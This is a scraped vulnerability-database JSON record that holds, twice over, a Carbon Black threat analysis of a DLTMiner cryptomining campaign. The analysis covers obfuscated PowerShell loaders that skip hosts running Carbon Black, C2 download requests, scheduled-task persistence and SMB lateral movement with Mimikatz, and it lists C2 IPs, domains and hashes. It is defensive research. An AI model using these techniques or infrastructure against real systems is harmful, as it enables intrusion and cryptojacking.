"ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-07-29T16:40:11", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2021-07-29T16:40:11", "rev": 2}}, "objectVersion": "1.6", "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}], "carbonblack": [{"id": "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D", "hash": "34fb77003032a9ec1af4e7cbf893b51cfd672888dd781c3262e0c5a460a8b3f3", "type": "carbonblack", "bulletinFamily": "blog", "title": "CB TAU Technical Analysis: DLTMiner Campaign Targeting Corporations in Asia", "description": "A CB customer recently provided a series of commands that they had observed for analysis. The customer felt that the associated attacker activity may have been attempting to tamper with the Carbon Black product. It turned out they were not, but the attackers were specifically looking for the presence of Carbon Black and, if present, would not perform any additional malicious actions and their script would exit. \n\n**Note:** [If you are a Carbon Black customer looking for information on how CB solutions defend against this campaign, click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-DLTMiner-Campaign/ta-p/76690>)\n\nAfter analysis, TAU determined that this activity appears to be related to a DLTMiner campaign which was primarily targeting Asian corporations. This campaign appears to be an evolution of a campaign that was initially reported in January of 2019. The campaign in the past has incorporated both crypto-mining and crypto-jacking aspects. The customer did not provide any context to how they suspected that the attackers initially gained entry into the network, however previously disclosed DLTMiner campaigns exploited the Eternal Blue vulnerability (MS17-010 and CVE-2017-0143 - 0148) as well as RDP brute forcing. The portion of this attack that specifically pertained to Carbon Black products, was not an attack on the product itself or a vulnerability in the product. However, the attacker was specifically looking for the presence of Carbon Black products and if located the script would then exit, before performing any additional malicious actions. The initial commands issued by the attacker would decode several layers or obfuscated PowerShell code, which ultimately downloaded additional PowerShell scripts from two different embedded C2 sites. One of the C2 sites is non responsive, and is believed to be parked. __\n\n_Figure 1: Attack Overview_\n\n# Technical Analysis\n\n## PowerShell Command - Carbon Black Enumeration\n\nThe original command that was provided is displayed below and was slightly altered to make viewing the contents easier to read. The area highlighted in the red box, is the portion of the command that the customer felt was targeting Carbon Black products.\n\n__\n\n_Figure 2: PowerShell Command_\n\nThe command appears to have backslashes (**\\**) removed from the file paths, before being submitted. However this PowerShell command would look to see if the directory **C:\\Windows\\CarbonBlack** existed, this is the default installation path for Carbon Black Response. If the directory exists it would modify the **AppMgmt** service\u2019s binary path to **C:\\Windows\\System32\\svchost.exe**. **_The script will then exit before performing any further actions that would be detected by CarbonBlack Products_**. These actions **do not** interact, modify, or tamper with the Carbon Black Response sensor or associated process or service.\n\n## PowerShell Command - Payload Execution\n\nThe payload for this attack was zlib compressed and base64 encoded before being embedded into the PowerShell command. The image below highlights the truncated payload, which is executed using the Invoke-Expression (iex) cmdlet.\n\n \n\n___Figure 3: PowerShell payload_\n\nTAU was able to base64 decode and partially decompress the payload, The payload was another PowerShell command, that was obfuscated using standard techniques that have been observed in numerous different types of campaigns. The metadata for the payload as it was decoded is listed below, however this was for the truncated data\n\nFile Name : payload\n\nFile Size : 3,266 bytes\n\nMD5 : b6fdbadea4dda2c54e51a16e18ca4e00\n\nSHA256 : d85096783eac330e575278ecef2a4ab1bde9ca9b5426edafaf5c425f3defd789 \n \n--- \n \n_Table 2: Payload Metadata_\n\n## Secondary Payload\n\nThe body of the PowerShell command is depicted in the image below. The obfuscation will build the final PowerShell command from an array of strings, and a custom order which is listed in brackets at the beginning.\n\n__\n\n_Figure 4: Secondary PowerShell Payload_\n\nBuilding the array from this truncated data, will not result in a properly formatted PowerShell script. However another sample was located, which was the same and could be properly formatted, which resulted in the following script, depicted below. This script serves as a loader or cradle which will download additional malicious code or script, that will then be entrenched on the system as a scheduled service, dependent upon other variables.\n\n__\n\n_Figure 5: Secondary PowerShell Payload_\n\n### Secondary Payload Analysis\n\nThe script above will perform several different checks and create different variables, which are used for C2 communications. In the image below the script will gather and format the MAC address for the system and set that as a variable, highlighted in red. The script will then set the $flag variable (whose name is reused later) to a non-existent variable, which is then set to True in line 5, if script is able to create the mutex \u2018Global\\PSEXEC\u2019. All of that activity is highlighted in blue.\n\n__\n\n_Figure 6: Variables Set and System information_\n\nFrom the area highlighted in green above, the script will create a string that is composed of different hard coded variables and basic system information. The variables and their descriptions are listed in the table below.\n\nSystem Parameters \n \n--- \n \n_Variable Name_\n\n| \n\n_Notes_ \n \nmac\n\n| \n\nMAC address of the current system \n \nav\n\n| \n\nThis variable is not set in this version of the script. In previous iterations of this script, there may have been code that enumerated if AV was running on the system. \n \nversion\n\n| \n\nThis retrieves the MS Windows Version number (ex. 10.1.XXXX or 6.2.XXXX) \n \nbit\n\n| \n\nThis retrieves the OS architecture (ex. 32-bit of 64-bit) \n \nflag2\n\n| \n\nThis is the flag variable that was set in the previous section. This will be listed as True if the Mutex was created and False if that operation failed. This and the PS argument should always match. \n \ndomain\n\n| \n\nThis retrieves the domain that the system is joined to. \n \nuser\n\n| \n\nThis retrieves the current user account name \n \nPS\n\n| \n\nThis is the flag variable that was set in the previous section. This will be listed as True if the Mutex was created and False if that operation failed. This and the flag2 argument should always match. \n \n_Table 3: System Information_\n\nThe script will then set another set of variables and conduct some additional checks. The current date will be stored as the $dt variable, and used in C2 communications, highlighted in green. The $flag and $flag2 variables are set depending on whether or not certain files exist on the current system, highlighted in blue. The final check is for the variable $permit, which determines if the current process is running with Administrator privileges. \n\n__\n\n_Figure 7: Second Variables Set and System information_\n\nThe variables and checks that were conducted in the previous steps are then used to determine which embedded C2 to communicate with, as well as what resource to request from the C2. The script will check, via the $flag variable, to see if the file ccc.log exist in the user\u2019s temp folder. If not, then it would create that file, which is highlighted in red in the image below. \n\nThe next check would determine if the current process was running with Administrator privileges, via the $permit variable. Regardless of whether or not the process was running with Administrator privileges, the script would contact the C2 **hXXP://cdn.chatcdn[.]net**. If running with Administrator privileges the request would contain \u201c**p?hig**\u201d and the date from the $dt variable. If not the request would contain \u201c**p?low**\u201d and the date. The response was expected to be a string, that was base64 encoded. A scheduled task, named **Winnet**, is then created to run every 45 minutes, which will execute PowerShell and the base64 encoded payload from the C2 site. The only difference in the two instances is whether the scheduled task runs as under the context of the \u201csystem\u201d or not. All of this activity is highlighted in blue below. \n\n____\n\n_Figure 8: C2 Communications_\n\nAt the time of this analysis the C2 site **hXXP://cdn.chatcdn[.]net** was not actively responding to request. It should be noted that originally this domain was resolving to the IP Address 134[.]209.103.152, which was the secondary C2 in this specific script, beginning on April 29, 2019. On approximately May 14, 2019, this domain was parked at 0[.]0.0.0, which is a common technique. However on approximately May 15, 2019 the domain began resolving to 74[.]119.239.234, which appears to be either a public-domain parking IP Address or less likely a sinkhole. TAU was unable to find a sample of the response from the server when it was originally responding to request. However directly making request to the original IP address, where the C2 resolved will return a payload which is described in a later section. \n\nResolved IP\n\n| \n\nFirst Observed \n \n---|--- \n \n74[.]119.239.234\n\n| \n\n5/15/19 20:41 \n \n0[.]0.0.0\n\n| \n\n5/14/19 1:58 \n \n134[.]209.103.152\n\n| \n\n4/29/19 5:33 \n \n_Table 4: Domain Name Resolution_\n\nIf the ccc.log file exists on the system, which from the flow of the script will always occur as the previous conditional statement creates the file it did not exist, then the script will reach out to a secondary C2. This activity is highlighted in green in the image above. The script will reach out to 134[.]209.103.152 and request \u201c**update?**\u201d with the system information string that was created in the first portion of the analysis. The response as of this testing was an additional PowerShell script that would be executed, via cmd.exe, which will launch PowerShell and the third stage payload. It should be noted that TAU was able to locate a payload that was being provided from that same C2 on May 16, 2019. In both those instances the metadata for the file was the same, which is listed in the table below. \n\nFile Name : Third_Stage\n\nFile Size : 3,110,651 bytes\n\nMD5 : 500a3b178af4d066a88a27edf1a278c0\n\nSHA256 : 1756723b89788ba0f53ce9752e40ae50c7545c8993d4ca08768463289a73a53b \n \n--- \n \n_Table 5: Third Stage Payload_\n\n## Third Stage Payload\n\nA small subset of the third stage payload that is downloaded from 134[.]209.103.152, is depicted in the image below. The script uses reverse order, character replacement, and other standard obfuscation techniques to deter analysis.\n\n__\n\n_Figure 9: Third Stage Payload_\n\nTAU was able to decode the script (to a reasonable degree), which appears to be a variant of an open source script used to exploit SMB vulnerabilities for lateral movement, commonly referred to as Invoke-SMBExec. The script contains an embedded PE file, that is base64 encoded, that appears to be a version of Mimikatz. Due to some of the errors in the decoding process that could not be confirmed.\n\n## Campaign\n\n### Initial Campaign\n\nThe initial campaign that is related to this incident was disclosed in January of 2019 by 360.cn. In that campaign there was overlap in the manner in which PowerShell scripts were formatted and variables set. Additionally the manner in which the request and data was being sent to the C2 server aligns with what was observed in the current campaign. This initial campaign appears to have been active from January 2019 throughout February of 2019, and targeting organizations in China.\n\nAdditionally there was a campaign that was documented in April, that was also attributed to the original campaign. In this campaign organizations in Japan, Australia, Taiwan, Vietnam, Hong Kong, and India were being targeted for Monero cryptocurrency mining. In this campaign different artifacts from the PowerShell scripts being used, the exploitation of SMB vulnerabilities, reflective injection of payloads, and C2 communication structure aligns with what was observed in the ongoing campaign. This portion of the larger campaign occurred in the March and April 2019 time frames.\n\n**Ongoing Campaign**\n\nTAU was able to track an ongoing campaign that was related to the truncated command that was submitted in this escalation. In this latest portion of the campaign organizations in Asia were being targeted. TAU identified two potential victims, which were both hospitals one located in Vietnam and the United States. The script that was submitted overlaps in C2 infrastructure to at least 3 others scripts that were located in public repositories. In the image below, the submitted script is located at the top left of the image. C2 communications are depicted in dotted red lines, while URL resolutions are in orange lines. Files that are being served up by different C2s are list in dotted blue lines.__\n\n_Figure 10: Campaign Overview_\n\n**Remediation:**\n\n## **MITRE ATT&amp;CK TIDs **\n\n**TID**\n\n| \n\n**Tactic**\n\n| \n\n**Description** \n \n---|---|--- \n \nT1110\n\n| \n\nCredential Access\n\n| \n\n**Brute Force: **It was previously reported that DLTMiner campaigns was utilizing RDP brute forcing for initial access. \n \nT1190\n\n| \n\nInitial Access\n\n| \n\n**Exploit Public-Facing Application:** Eternal Blue vulnerability was also reported to be used in connection with this campaign \n \nT1086\n\n| \n\nExecution\n\n| \n\n**PowerShell:** PowerShell is heavily leveraged \n \nT1053\n\n| \n\nPersistence\n\n| \n\n**Scheduled Tasks:** Persistence is maintained via scheduled tasks \n \nT1210\n\n| \n\nLateral Movement\n\n| \n\nSMB: One of the additional payloads will enumerate lateral systems and attempt to exploit the eternal blue vulnerabilites \n \n \n\n## IOCs\n\nRelated Sample Hashes \n \n--- \n \n0c3f63af1e35d1b384a01d8caa8c49d6c7946affe1386a697079c352b76eaeef\n\n| \n\nRelated PowerShell Script \n \n21d783d08299b73f24a7cc20c3e5b43b13c06aea1bf9caca66aef09799719598\n\n| \n\nRelated PowerShell Script \n \n1b987ba4983d98a4c2776c8afb5aebbe418cdea1a7d4960c548fb947d404e4b2\n\n| \n\nRelated PowerShell Script \n \n1756723b89788ba0f53ce9752e40ae50c7545c8993d4ca08768463289a73a53b\n\n| \n\nLateral Movement Script \n \n134.209.103.152\n\n| \n\nC2 \n \ncdn.chatcdn.net\n\n| \n\nC2 \n \n206.189.87.176\n\n| \n\nPotential Parking IP Address \n \nexplorer.sombewallet.tk\n\n| \n\nC2 \n \n134.209.103.236\n\n| \n\nC2 \n \np.estonine.com\n\n| \n\nC2 \n \n128.199.99.33\n\n| \n\nC2 \n \nThe post [CB TAU Technical Analysis: DLTMiner Campaign Targeting Corporations in Asia](<https://www.carbonblack.com/2019/07/23/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "published": "2019-07-23T13:47:50", "modified": "2019-07-23T13:47:50", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.carbonblack.com/2019/07/23/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/", "reporter": "Ryan Murphy", "references": [], "cvelist": ["CVE-2017-0143"], "lastseen": "2019-07-23T14:42:33", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "A CB customer recently provided a series of commands that they had observed for analysis. The customer felt that the associated attacker activity may have been attempting to tamper with the Carbon Black product. It turned out they were not, but the attackers were specifically looking for the presence of Carbon Black and, if present, would not perform any additional malicious actions and their script would exit. \n\n**Note:** [If you are a Carbon Black customer looking for information on how CB solutions defend against this campaign, click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-DLTMiner-Campaign/ta-p/76690>)\n\nAfter analysis, TAU determined that this activity appears to be related to a DLTMiner campaign which was primarily targeting Asian corporations. This campaign appears to be an evolution of a campaign that was initially reported in January of 2019. The campaign in the past has incorporated both crypto-mining and crypto-jacking aspects. The customer did not provide any context to how they suspected that the attackers initially gained entry into the network, however previously disclosed DLTMiner campaigns exploited the Eternal Blue vulnerability (MS17-010 and CVE-2017-0143 - 0148) as well as RDP brute forcing. The portion of this attack that specifically pertained to Carbon Black products, was not an attack on the product itself or a vulnerability in the product. However, the attacker was specifically looking for the presence of Carbon Black products and if located the script would then exit, before performing any additional malicious actions. The initial commands issued by the attacker would decode several layers or obfuscated PowerShell code, which ultimately downloaded additional PowerShell scripts from two different embedded C2 sites. One of the C2 sites is non responsive, and is believed to be parked. __\n\n_Figure 1: Attack Overview_\n\n# Technical Analysis\n\n## PowerShell Command - Carbon Black Enumeration\n\nThe original command that was provided is displayed below and was slightly altered to make viewing the contents easier to read. The area highlighted in the red box, is the portion of the command that the customer felt was targeting Carbon Black products.\n\n__\n\n_Figure 2: PowerShell Command_\n\nThe command appears to have backslashes (**\\**) removed from the file paths, before being submitted. However this PowerShell command would look to see if the directory **C:\\Windows\\CarbonBlack** existed, this is the default installation path for Carbon Black Response. If the directory exists it would modify the **AppMgmt** service\u2019s binary path to **C:\\Windows\\System32\\svchost.exe**. **_The script will then exit before performing any further actions that would be detected by CarbonBlack Products_**. These actions **do not** interact, modify, or tamper with the Carbon Black Response sensor or associated process or service.\n\n## PowerShell Command - Payload Execution\n\nThe payload for this attack was zlib compressed and base64 encoded before being embedded into the PowerShell command. The image below highlights the truncated payload, which is executed using the Invoke-Expression (iex) cmdlet.\n\n \n\n___Figure 3: PowerShell payload_\n\nTAU was able to base64 decode and partially decompress the payload, The payload was another PowerShell command, that was obfuscated using standard techniques that have been observed in numerous different types of campaigns. The metadata for the payload as it was decoded is listed below, however this was for the truncated data\n\nFile Name : payload\n\nFile Size : 3,266 bytes\n\nMD5 : b6fdbadea4dda2c54e51a16e18ca4e00\n\nSHA256 : d85096783eac330e575278ecef2a4ab1bde9ca9b5426edafaf5c425f3defd789 \n \n--- \n \n_Table 2: Payload Metadata_\n\n## Secondary Payload\n\nThe body of the PowerShell command is depicted in the image below. The obfuscation will build the final PowerShell command from an array of strings, and a custom order which is listed in brackets at the beginning.\n\n__\n\n_Figure 4: Secondary PowerShell Payload_\n\nBuilding the array from this truncated data, will not result in a properly formatted PowerShell script. However another sample was located, which was the same and could be properly formatted, which resulted in the following script, depicted below. This script serves as a loader or cradle which will download additional malicious code or script, that will then be entrenched on the system as a scheduled service, dependent upon other variables.\n\n__\n\n_Figure 5: Secondary PowerShell Payload_\n\n### Secondary Payload Analysis\n\nThe script above will perform several different checks and create different variables, which are used for C2 communications. In the image below the script will gather and format the MAC address for the system and set that as a variable, highlighted in red. The script will then set the $flag variable (whose name is reused later) to a non-existent variable, which is then set to True in line 5, if script is able to create the mutex \u2018Global\\PSEXEC\u2019. All of that activity is highlighted in blue.\n\n__\n\n_Figure 6: Variables Set and System information_\n\nFrom the area highlighted in green above, the script will create a string that is composed of different hard coded variables and basic system information. The variables and their descriptions are listed in the table below.\n\nSystem Parameters \n \n--- \n \n_Variable Name_\n\n| \n\n_Notes_ \n \nmac\n\n| \n\nMAC address of the current system \n \nav\n\n| \n\nThis variable is not set in this version of the script. In previous iterations of this script, there may have been code that enumerated if AV was running on the system. \n \nversion\n\n| \n\nThis retrieves the MS Windows Version number (ex. 10.1.XXXX or 6.2.XXXX) \n \nbit\n\n| \n\nThis retrieves the OS architecture (ex. 32-bit of 64-bit) \n \nflag2\n\n| \n\nThis is the flag variable that was set in the previous section. This will be listed as True if the Mutex was created and False if that operation failed. This and the PS argument should always match. \n \ndomain\n\n| \n\nThis retrieves the domain that the system is joined to. \n \nuser\n\n| \n\nThis retrieves the current user account name \n \nPS\n\n| \n\nThis is the flag variable that was set in the previous section. This will be listed as True if the Mutex was created and False if that operation failed. This and the flag2 argument should always match. \n \n_Table 3: System Information_\n\nThe script will then set another set of variables and conduct some additional checks. The current date will be stored as the $dt variable, and used in C2 communications, highlighted in green. The $flag and $flag2 variables are set depending on whether or not certain files exist on the current system, highlighted in blue. The final check is for the variable $permit, which determines if the current process is running with Administrator privileges. \n\n__\n\n_Figure 7: Second Variables Set and System information_\n\nThe variables and checks that were conducted in the previous steps are then used to determine which embedded C2 to communicate with, as well as what resource to request from the C2. The script will check, via the $flag variable, to see if the file ccc.log exist in the user\u2019s temp folder. If not, then it would create that file, which is highlighted in red in the image below. \n\nThe next check would determine if the current process was running with Administrator privileges, via the $permit variable. Regardless of whether or not the process was running with Administrator privileges, the script would contact the C2 **hXXP://cdn.chatcdn[.]net**. If running with Administrator privileges the request would contain \u201c**p?hig**\u201d and the date from the $dt variable. If not the request would contain \u201c**p?low**\u201d and the date. The response was expected to be a string, that was base64 encoded. A scheduled task, named **Winnet**, is then created to run every 45 minutes, which will execute PowerShell and the base64 encoded payload from the C2 site. The only difference in the two instances is whether the scheduled task runs as under the context of the \u201csystem\u201d or not. All of this activity is highlighted in blue below. \n\n____\n\n_Figure 8: C2 Communications_\n\nAt the time of this analysis the C2 site **hXXP://cdn.chatcdn[.]net** was not actively responding to request. It should be noted that originally this domain was resolving to the IP Address 134[.]209.103.152, which was the secondary C2 in this specific script, beginning on April 29, 2019. On approximately May 14, 2019, this domain was parked at 0[.]0.0.0, which is a common technique. However on approximately May 15, 2019 the domain began resolving to 74[.]119.239.234, which appears to be either a public-domain parking IP Address or less likely a sinkhole. TAU was unable to find a sample of the response from the server when it was originally responding to request. However directly making request to the original IP address, where the C2 resolved will return a payload which is described in a later section. \n\nResolved IP\n\n| \n\nFirst Observed \n \n---|--- \n \n74[.]119.239.234\n\n| \n\n5/15/19 20:41 \n \n0[.]0.0.0\n\n| \n\n5/14/19 1:58 \n \n134[.]209.103.152\n\n| \n\n4/29/19 5:33 \n \n_Table 4: Domain Name Resolution_\n\nIf the ccc.log file exists on the system, which from the flow of the script will always occur as the previous conditional statement creates the file it did not exist, then the script will reach out to a secondary C2. This activity is highlighted in green in the image above. The script will reach out to 134[.]209.103.152 and request \u201c**update?**\u201d with the system information string that was created in the first portion of the analysis. The response as of this testing was an additional PowerShell script that would be executed, via cmd.exe, which will launch PowerShell and the third stage payload. It should be noted that TAU was able to locate a payload that was being provided from that same C2 on May 16, 2019. In both those instances the metadata for the file was the same, which is listed in the table below. \n\nFile Name : Third_Stage\n\nFile Size : 3,110,651 bytes\n\nMD5 : 500a3b178af4d066a88a27edf1a278c0\n\nSHA256 : 1756723b89788ba0f53ce9752e40ae50c7545c8993d4ca08768463289a73a53b \n \n--- \n \n_Table 5: Third Stage Payload_\n\n## Third Stage Payload\n\nA small subset of the third stage payload that is downloaded from 134[.]209.103.152, is depicted in the image below. The script uses reverse order, character replacement, and other standard obfuscation techniques to deter analysis.\n\n__\n\n_Figure 9: Third Stage Payload_\n\nTAU was able to decode the script (to a reasonable degree), which appears to be a variant of an open source script used to exploit SMB vulnerabilities for lateral movement, commonly referred to as Invoke-SMBExec. The script contains an embedded PE file, that is base64 encoded, that appears to be a version of Mimikatz. Due to some of the errors in the decoding process that could not be confirmed.\n\n## Campaign\n\n### Initial Campaign\n\nThe initial campaign that is related to this incident was disclosed in January of 2019 by 360.cn. In that campaign there was overlap in the manner in which PowerShell scripts were formatted and variables set. Additionally the manner in which the request and data was being sent to the C2 server aligns with what was observed in the current campaign. This initial campaign appears to have been active from January 2019 throughout February of 2019, and targeting organizations in China.\n\nAdditionally there was a campaign that was documented in April, that was also attributed to the original campaign. In this campaign organizations in Japan, Australia, Taiwan, Vietnam, Hong Kong, and India were being targeted for Monero cryptocurrency mining. In this campaign different artifacts from the PowerShell scripts being used, the exploitation of SMB vulnerabilities, reflective injection of payloads, and C2 communication structure aligns with what was observed in the ongoing campaign. This portion of the larger campaign occurred in the March and April 2019 time frames.\n\n**Ongoing Campaign**\n\nTAU was able to track an ongoing campaign that was related to the truncated command that was submitted in this escalation. In this latest portion of the campaign organizations in Asia were being targeted. TAU identified two potential victims, which were both hospitals one located in Vietnam and the United States. The script that was submitted overlaps in C2 infrastructure to at least 3 others scripts that were located in public repositories. In the image below, the submitted script is located at the top left of the image. C2 communications are depicted in dotted red lines, while URL resolutions are in orange lines. Files that are being served up by different C2s are list in dotted blue lines.__\n\n_Figure 10: Campaign Overview_\n\n**Remediation:**\n\n## **MITRE ATT&amp;CK TIDs **\n\n**TID**\n\n| \n\n**Tactic**\n\n| \n\n**Description** \n \n---|---|--- \n \nT1110\n\n| \n\nCredential Access\n\n| \n\n**Brute Force: **It was previously reported that DLTMiner campaigns was utilizing RDP brute forcing for initial access. \n \nT1190\n\n| \n\nInitial Access\n\n| \n\n**Exploit Public-Facing Application:** Eternal Blue vulnerability was also reported to be used in connection with this campaign \n \nT1086\n\n| \n\nExecution\n\n| \n\n**PowerShell:** PowerShell is heavily leveraged \n \nT1053\n\n| \n\nPersistence\n\n| \n\n**Scheduled Tasks:** Persistence is maintained via scheduled tasks \n \nT1210\n\n| \n\nLateral Movement\n\n| \n\nSMB: One of the additional payloads will enumerate lateral systems and attempt to exploit the eternal blue vulnerabilites \n \n \n\n## IOCs\n\nRelated Sample Hashes \n \n--- \n \n0c3f63af1e35d1b384a01d8caa8c49d6c7946affe1386a697079c352b76eaeef\n\n| \n\nRelated PowerShell Script \n \n21d783d08299b73f24a7cc20c3e5b43b13c06aea1bf9caca66aef09799719598\n\n| \n\nRelated PowerShell Script \n \n1b987ba4983d98a4c2776c8afb5aebbe418cdea1a7d4960c548fb947d404e4b2\n\n| \n\nRelated PowerShell Script \n \n1756723b89788ba0f53ce9752e40ae50c7545c8993d4ca08768463289a73a53b\n\n| \n\nLateral Movement Script \n \n134.209.103.152\n\n| \n\nC2 \n \ncdn.chatcdn.net\n\n| \n\nC2 \n \n206.189.87.176\n\n| \n\nPotential Parking IP Address \n \nexplorer.sombewallet.tk\n\n| \n\nC2 \n \n134.209.103.236\n\n| \n\nC2 \n \np.estonine.com\n\n| \n\nC2 \n \n128.199.99.33\n\n| \n\nC2 \n \nThe post [CB TAU Technical Analysis: DLTMiner Campaign Targeting Corporations in Asia](<https://www.carbonblack.com/2019/07/23/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-07-23T14:42:33", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-07-23T14:42:33", "rev": 2, "value": 7.1, "vector": "NONE"}}, "hash": "5e05ddf457dd86f964467b8cb9a99daf87f2304078367f280586b4362c195e78", "hashmap": [{"hash": "6101e9f771e61bdfabc16c72de3bc4c0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "4d7c56a2d2ea0a8d03229d75af6c9cc6", "key": "reporter"}, {"hash": "807b338c137f68e7a8be7b0d14b1be6b", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "32ae473f1e2110324d79ae9eafed33a8", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "786924bd5317723ff221ebbab8ef99bc", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "786924bd5317723ff221ebbab8ef99bc", "key": "published"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "24b2b1d79a96c55d12baea27902490f4", "key": "type"}], "history": [], "href": "https://www.carbonblack.com/2019/07/23/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/", "id": "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D", "immutableFields": [], "lastseen": "2019-07-23T14:42:33", "modified": "2019-07-23T13:47:50", "objectVersion": "1.5", "published": "2019-07-23T13:47:50", "references": [], "reporter": "Ryan Murphy", "title": "CB TAU Technical Analysis: DLTMiner Campaign Targeting Corporations in Asia", "type": "carbonblack", "viewCount": 1163}, "different_elements": 